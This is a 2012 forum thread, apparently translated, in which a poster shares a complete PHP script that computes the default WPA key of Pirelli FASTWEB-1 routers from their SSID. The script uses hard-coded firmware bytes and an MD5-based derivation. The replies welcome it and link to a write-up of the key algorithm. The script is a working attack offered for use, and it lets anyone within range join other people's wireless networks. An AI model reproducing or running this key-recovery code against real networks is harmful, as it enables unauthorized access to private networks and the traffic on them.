Title: FastWeb Pirelli WPA Discovery (Find the WPA key of FASTWEB-1-XXX networks)
Posted by: P4nd3m0n1um on 11 November 2012, 21:20 pm
Simple script to find out the default WPA key of FASTWEB-1-00193EA1B2C3 networks:

<?php
/***************************************************************************
 *   FastWeb Pirelli WPA Discovery                                         *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the          *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.              *
 ***************************************************************************/

/*
 * Starting SSID.
 */
$ssid = "FASTWEB-1-00193EA1B2C3";

/*
 * 20 constant bytes hard-wired into the Pirelli Fastweb firmware.
 */
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";

/*
 * Take the final part of the SSID.
 * (explode() replaces split(), which was removed in PHP 7.)
 */
$sn = explode( '-', $ssid );
$sn = $sn[2];

/*
 * Split it into groups of two characters, forming an array
 * of 6 hexadecimal byte representations.
 */
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];

/*
 * Initialize a string with the integer value of these bytes.
 */
$str = "";
for( $i = 0; $i < 6; $i++ ){
    $str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";

/*
 * Append the 20 "magic" bytes to the string.
 */
$str .= $seq_20;

/*
 * Get the bytes of the MD5 hash of the string.
 */
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long = "";

/*
 * Convert the bytes into 8-bit binary sequences.
 */
foreach( $md5_bytes as $byte ){
    $long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}

/*
 * Split into 5 groups of 5 bits each and, whenever the integer value
 * of a group is greater than 0x0a, add 0x57.
 */
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
    $n = bindec( substr( $long, $i, 5 ) );
    $hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}

/*
 * Compose the key.
 */
$wpa = "";
foreach( $hex_5 as $hex ){
    $wpa .= sprintf( "%02x", $hex );
}

print "WPA : $wpa\n";
?>

Title: Re: FastWeb Pirelli WPA Discovery (Find the WPA key of FASTWEB-1-XXX networks)
Posted by: pianista on 14 November 2012, 11:07 am
Interesting, I haven't seen many of them around here, nor of the Alice ones, but of course all advances along these lines are welcome ;)
Regards

Title: Re: FastWeb Pirelli WPA Discovery (Find the WPA key of FASTWEB-1-XXX networks)
Posted by: HalconEye on 20 January 2013, 13:27 pm
http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/